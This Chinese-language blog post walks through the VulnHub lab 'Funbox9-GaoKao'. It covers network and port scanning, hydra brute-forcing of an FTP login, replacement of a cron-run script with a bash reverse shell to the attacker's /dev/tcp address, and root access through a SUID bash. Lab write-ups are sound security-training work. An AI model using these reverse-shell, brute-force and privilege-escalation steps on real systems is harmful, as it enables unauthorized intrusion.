0
点赞
收藏
分享

微信扫一扫

靶机渗透练习30-Funbox9-GaoKao

独兜曲 2022-04-18 阅读 34
web安全

靶机描述

靶机地址:https://www.vulnhub.com/entry/funbox-gaokao,707/

一、搭建靶机环境

攻击机Kali

靶机

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

☁  kali  arp-scan -I eth0 -l                                                                                                                           
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:ce:b3:82       PCS Systemtechnik GmbH
192.168.9.48    08:00:27:84:5a:6f       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 2 responded
☁  kali 
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

☁  kali  nmap -A -sV -T4 -p- 192.168.9.48
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 14:56 CST
Nmap scan report for 192.168.9.48
Host is up (0.00038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
|   256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_  256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wellcome to Funbox: Gaokao !
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open  mysql   MySQL 5.7.34-0ubuntu0.18.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.34-0ubuntu0.18.04.1
|   Thread ID: 4
|   Capabilities flags: 65535
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, ConnectWithDatabase, LongPassword, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, Support41Auth, LongColumnFlag, IgnoreSigpipes, FoundRows, InteractiveClient, SupportsTransactions, SupportsLoadDataLocal, SupportsCompression, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: HPU~~D\x17\x01a&,\x15;\x18\x17\x0Ef\x7F'|
|_  Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.34_Auto_Generated_Server_Certificate
| Not valid before: 2021-06-05T15:15:30
|_Not valid after:  2031-06-03T15:15:30
MAC Address: 08:00:27:84:5A:6F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.9.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.30 seconds

21—ftp—ProFTPD 1.3.5e—Anonymous FTP login allowed (FTP code 230)

22—ssh—OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80—http—Apache httpd 2.4.29 ((Ubuntu))

3306—mysql—MySQL 5.7.34-0ubuntu0.18.04.1

2.2枚举漏洞

2.2.1 21端口分析

由于我们可以匿名访问 FTP 服务器

☁  FunBox9  ftp 192.168.9.48                 
Connected to 192.168.9.48.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.9.48]
Name (192.168.9.48:hirak0): anonymous 
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.9.7 !
230-
230-The local time is: Thu Mar 17 07:24:26 2022
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

发现sky@funbox9

2.2.2 22 端口分析

一般只能暴力破解,暂时没有合适的字典

2.2.3 80 端口分析

2.3漏洞利用

2.3.1 修改定时任务文件getshell

使用hydra爆破一下sky密码

hydra -l sky -P /usr/share/wordlists/rockyou.txt 192.168.9.48 ftp

☁  FunBox9  hydra -l sky -P /usr/share/wordlists/rockyou.txt 192.168.9.48 ftp
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-17 15:26:17
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.9.48:21/
[STATUS] 373.00 tries/min, 373 tries in 00:01h, 14344026 to do in 640:56h, 16 active
[21][ftp] host: 192.168.9.48   login: sky   password: thebest
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-17 15:28:39

成功拿到账户密码sky:thebest

由于kali默认的 ftp 客户端不是友好,这里使用 lftp

☁  FunBox9  lftp -u sky,thebest 192.168.9.48
lftp sky@192.168.9.48:~> ls
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
lftp sky@192.168.9.48:~> ls -al
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
lftp sky@192.168.9.48:~> cat user.flag
#!/bin/sh
echo "Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd"
68 bytes transferred
lftp sky@192.168.9.48:~> 

我们可以看到该flag具有一个 shell 脚本,并且该文件具有用户 sarah 的可执行评估。因此,我们可能会猜测有一个由 sarah 运行的 cron 作业。因此,我将文件下载到本地计算机,更新脚本并将其上传到 ftp 服务器。

lftp sky@192.168.9.48:~> put user.flag
52 bytes transferred
lftp sky@192.168.9.48:~> ls -al
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          52 Mar 17 07:41 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
lftp sky@192.168.9.48:~> cat user.flag
#!/bin/sh
bash -i >& /dev/tcp/192.168.9.7/6666 0>&1
54 bytes transferred
lftp sky@192.168.9.48:~> 

kali本地监听:nc -lvp 6666,成功拿到shell

☁  FunBox9  nc -lvp 6666
listening on [any] 6666 ...
192.168.9.48: inverse host lookup failed: Host name lookup failure
connect to [192.168.9.7] from (UNKNOWN) [192.168.9.48] 53418
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$ 

使用Python切换一下shell:python -c 'import pty;pty.spawn("/bin/bash")'

但是,由于 python 的方式无法让我获得 PTY shell,所以我找到了以下方法。

SHELL=/bin/bash script -q /dev/null

2.4权限提升

2.4.1 信息收集

接下来,当我搜索 suid 二进制文件时,我发现 bash 已启用 setuid

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

bash-4.4$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-sr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /bin/umount
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-sr-x 1 root mail 96648 Nov 16  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 113528 Feb  2  2021 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
bash-4.4$ 

https://gtfobins.github.io查找到/bin/bash

image-20220317155513384

我们使用suid提权

运行bash -p命令,进入root目录到查找到root.flag

bash-4.4$ bash -p
bash -p
bash-4.4# id
id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)
bash-4.4# cd /root
cd /root
bash-4.4# ls -al
ls -al
total 28
drwx------  4 root root 4096 Jun  6  2021 .
drwxr-xr-x 24 root root 4096 Jun  5  2021 ..
-rw-------  1 root root    0 Jun  6  2021 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 2289 Jun  5  2021 root.flag
drwx------  2 root root 4096 Jun  5  2021 .ssh
drwxr-xr-x  2 root root 4096 Jun  5  2021 .vim
-rw-------  1 root root    0 Jun  6  2021 .viminfo
bash-4.4# cat root.flag
cat root.flag


  █████▒█    ██  ███▄    █  ▄▄▄▄    ▒█████  ▒██   ██▒     ▄████  ▄▄▄       ▒█████   ██ ▄█▀▄▄▄       ▒█████  
▓██   ▒ ██  ▓██▒ ██ ▀█   █ ▓█████▄ ▒██▒  ██▒▒▒ █ █ ▒░    ██▒ ▀█▒▒████▄    ▒██▒  ██▒ ██▄█▒▒████▄    ▒██▒  ██▒
▒████ ░▓██  ▒██░▓██  ▀█ ██▒▒██▒ ▄██▒██░  ██▒░░  █   ░   ▒██░▄▄▄░▒██  ▀█▄  ▒██░  ██▒▓███▄░▒██  ▀█▄  ▒██░  ██▒
░▓█▒  ░▓▓█  ░██░▓██▒  ▐▌██▒▒██░█▀  ▒██   ██░ ░ █ █ ▒    ░▓█  ██▓░██▄▄▄▄██ ▒██   ██░▓██ █▄░██▄▄▄▄██ ▒██   ██░
░▒█░   ▒▒█████▓ ▒██░   ▓██░░▓█  ▀█▓░ ████▓▒░▒██▒ ▒██▒   ░▒▓███▀▒ ▓█   ▓██▒░ ████▓▒░▒██▒ █▄▓█   ▓██▒░ ████▓▒░
 ▒ ░   ░▒▓▒ ▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░    ░▒   ▒  ▒▒   ▓▒█░░ ▒░▒░▒░ ▒ ▒▒ ▓▒▒▒   ▓▒█░░ ▒░▒░▒░ 
 ░     ░░▒░ ░ ░ ░ ░░   ░ ▒░▒░▒   ░   ░ ▒ ▒░ ░░   ░▒ ░     ░   ░   ▒   ▒▒ ░  ░ ▒ ▒░ ░ ░▒ ▒░ ▒   ▒▒ ░  ░ ▒ ▒░ 
 ░ ░    ░░░ ░ ░    ░   ░ ░  ░    ░ ░ ░ ░ ▒   ░    ░     ░ ░   ░   ░   ▒   ░ ░ ░ ▒  ░ ░░ ░  ░   ▒   ░ ░ ░ ▒  
          ░              ░  ░          ░ ░   ░    ░           ░       ░  ░    ░ ░  ░  ░        ░  ░    ░ ░  
                                 ░                                                                          

You did it ! 
THX for playing Funbox: GAOKAO !

I look forward to see this screenshot on twitter: @0815R2d2
bash-4.4# 

总结

本靶机依旧是通过ftp进行信息收集,然后修改定时任务文件getshell,最后通过suid提权拿到flag

  1. hydra爆破ftp
  2. 信息收集
  3. suid提权
举报

相关推荐

靶机渗透练习25-Funbox4-CTF

靶机渗透练习32-Funbox11-Scriptkiddie

靶机渗透练习24-Funbox3-Easy

靶机渗透练习28-Funbox7-EasyEnum

靶机渗透练习26-Funbox5-Next Level

靶机渗透练习79-Venom

靶机渗透练习18-Jangow

靶机渗透练习21-Noob

靶机渗透练习68-Ripper

0 条评论